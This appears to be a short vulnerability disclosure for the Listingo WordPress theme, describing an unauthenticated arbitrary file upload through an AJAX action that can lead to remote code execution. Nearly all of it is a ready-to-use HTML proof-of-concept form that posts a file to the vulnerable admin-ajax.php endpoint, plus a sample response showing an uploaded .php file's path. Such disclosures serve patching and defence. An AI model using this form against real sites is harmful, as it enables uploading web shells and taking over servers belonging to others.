The theme does not validate files to be uploaded via an AJAX action available to unauthenticated users, which could allow them to upload arbitrary files and lead to RCE
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Listingo Unauthenticated File Upload</title>
</head>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php?action=listingo_temp_uploader" method="post" enctype="multipart/form-data">
Upload a File:
<input type="file" name="listingo_uploader" id="listingo_uploader">
<input type="submit" name="submit" value="Start Upload">
</form>
</body>
</html>
The response give the path to the file uploaded:
{"type":"success","url":"https:\/\/example.com\/wp-content\/uploads\/wp-custom-uploader\/1665086303.php","filename":"1665086303.php","message":"Image deleted."}